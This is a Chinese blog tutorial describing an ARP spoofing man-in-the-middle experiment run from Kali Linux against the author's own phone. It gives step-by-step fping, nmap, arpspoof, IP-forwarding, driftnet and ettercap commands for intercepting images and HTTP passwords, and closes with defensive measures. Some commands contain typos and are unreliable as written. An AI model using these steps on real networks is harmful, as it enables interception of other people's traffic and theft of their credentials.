内容简介:进行arp欺骗尝试纯属意外的看到了网上的一个视频觉得这个很有意思,所以我也想进行的一个尝试。kali linux简介:Kali Linux是一个基于Debian的Linux发行版,旨在进行高级渗透测试和安全审计。Kali中包含有对各种信息安全任务,如渗透测试,安全性研究,计算机取证和逆向工程面向数百款工具。Kali Linux由领先的信息安全培训公司Offensive Security开发,资助和维护。为什么选择kali linux:
前言
进行arp欺骗尝试纯属意外的看到了网上的一个视频觉得这个很有意思,所以我也想进行的一个尝试。 实验是在攻击主机是我本人的手机,请各位同学一定要遵守法律,做一名有理想、有道德、有文化、有纪律的好青(zhong)年。以下命令均在终端中运行。本篇文章仅限于学习、交流。请勿用于非法用途与活动。
所用的工具
- kali linux
- nmap
- arpspoof
- ettercap
- driftnet
kali linux简介:Kali Linux是一个基于Debian的 Linux 发行版,旨在进行高级渗透测试和安全审计。Kali中包含有对各种信息安全任务,如渗透测试,安全性研究,计算机取证和逆向工程面向数百款工具。Kali Linux由领先的信息安全培训公司Offensive Security开发,资助和维护。
为什么选择kali linux:
Kali linux系统包含了600多款渗透测试工具,包括Armitage(图形网络攻击管理工具),Nmap(端口扫描程序),Wireshark(数据包分析程序),John the Ripper 密码破解程序,Aircrack-ng(a 用于渗透测试无线局域网的软件套件),Burp套件和OWASP ZAP Web应用安全扫描器, 这些 工具 可以用于漏洞分析、密码攻击、无线攻击、逆向工程、ARP欺骗等等,而且这些工具本身就已经内置于系统之中,不需要开发人员开发,直接就可以使用。nmap、arpspoof、ettercap、driftnet这些工具都已安装,开箱即用。
ARP欺骗是什么和其原理
什么是arp欺骗:
ARP欺骗(英语:ARP spoofing)(ARP 的全称是 Address Resolution Protocol,直译过来是 地址解析协议。),又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。最早探讨ARP欺骗的文章是由Yuri Volobuev所写的《ARP与ICMP转向游戏》(ARP and ICMP redirection games)。
arp欺骗的原理:
1.一般情况下,ARP欺骗并不是使网络无法正常通信,而是通过冒充网关或其他主机使得到达网关或主机的流量通过攻击进行转发。通过转发流量可以对流量进行控制和查看,从而控制流量或得到机密信息。
2.ARP欺骗发送arp应答给局域网中其他的主机,其中包含网关的IP地址和进行ARP欺骗的主机MAC地址;并且也发送了ARP应答给网关,其中包含局域网中所有主机的IP地址和进行arp欺骗的主机MAC地址。当局域网中主机和网关收到ARP应答跟新ARP表后,主机和网关之间的流量就需要通过攻击主机进行转发。冒充主机的过程和冒充网关相同。
开始进行arp欺骗
1.首先要知道我们的网关是多少
windows平台用快捷键win+R输入cmd回车 输入 ipconfig
记下图中最下方的默认网关地址 192.168.2.1.
接着打开kalilinux(我的kali安装在了virtualbox虚拟机)输入: ifping
查看做自己的网卡和ip,分别为eth0、192.168.2.207
2 发现我们同wifi下的设备: fping -g -r 0 -s 192.168.2.1/24 | grep alive
-g 通过指定开始和结束地址来生成目标列表(例如:./fping –g 192.168.1.0 192.168.1.255)或者一个IP/掩码形式(例如:./fping –g 192.168.2.1/24) -r (当ping失败时,最大重试次数(默认为3次))
3 确定我们要进行arp的目标: nmap -T4 -O 192.168.2.166 192.168.2.207 192.168.2.208 192.168.2.232
-T4是为了让他结束的更快 -O 启用os检测。目标是我的手机努比亚:NX531J-xiyanXY.lan ip:192.168.2.233
4 开始进行arp欺骗
-
arpspoof -i eth0 (eth0是网卡) 192.168.2.233 (要进行欺骗的ip地址)192.168.2.1 (网关地址)
再打开一个终端输入(将网关地址和被攻击的ip地址调换位置进行)进行双向欺骗:
-
arpspoof -i eth0 (eth0是网卡) 192.168.2.1 (网关地址) 192.168.2.233(要进行欺骗的ip地址)
此时手机应该就连不上网了
5 进行端口转发: echo 1 > /porc/sys/net/ipv4/ip_forward
此命令为临时开启端口转发。
-
cat /porc/sys/net/ipv4/ip_forward
这条是查看否成功开启转发。
开启以后手机应该就可以上网了
6 进行图片嗅探:
dritnet -i eth0
7进行密码嗅探仅限http协议的网站
ettercap -Tq -i eth0
但是密码嗅探失败了
总结
经此看出我们的信息安全多么的不安全。且经过高手的升级也已经有了嗅探https协议的方法了。arp欺骗已经是很古老的方法了放在现在却依然有可以获得我们隐私的地方。防止被arp欺骗的方法有很多例如现在很多的路由器都支持防御arp欺骗。安装对ARP欺骗工具的防护软件采用静态的ARP缓存,在各主机上绑定网关的IP和MAC地址。在网关上绑定各主机的IP和MAC地址。
再次声明:实验是在攻击主机是我本人的手机,请各位同学一定要遵守法律,做一名有理想、有道德、有文化、有纪律的好青(zhong)年。以下命令均在终端中运行。本篇文章仅限于学习、交流。请勿用于非法用途与活动。
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 内网渗透技术之超越LLMNR/NBNS欺骗的ADIDNS欺骗攻击
- 网络层(八)ARP欺骗
- DNS劫持欺骗病毒“自杀”
- 欺骗技术优于蜜罐的8个理由
- 程序员自我欺骗的 9 个瞬间
- 一种新型的Web缓存欺骗攻击技术
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。